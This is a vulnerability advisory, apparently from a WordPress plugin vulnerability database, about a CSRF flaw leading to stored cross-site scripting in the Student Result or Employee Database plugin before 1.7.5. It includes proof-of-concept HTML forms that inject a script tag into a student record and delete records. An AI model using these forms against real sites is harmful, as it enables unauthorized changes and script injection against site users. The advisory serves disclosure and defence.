WordPress Plugin Vulnerabilities
Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF
Description
The plugin does not have CSRF in its AJAX actions, allowing attackers to make logged in user with a role as low as contributor to add/edit and delete students via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site scripting
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
<input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?action= ssr_del_st_submit" method="POST">
<input type="hidden" name="postID" value="<RID>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html> Affects Plugins
Fixed in version 1.7.5
References
Classification
Miscellaneous
Original Researcher
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Submitter
Vinay Varma Mudunuri
Verified
Yes
Timeline
Publicly Published
2022-08-01 (about 7 months ago)
Added
2022-08-01 (about 7 months ago)
Last Updated
2022-08-01 (about 7 months ago)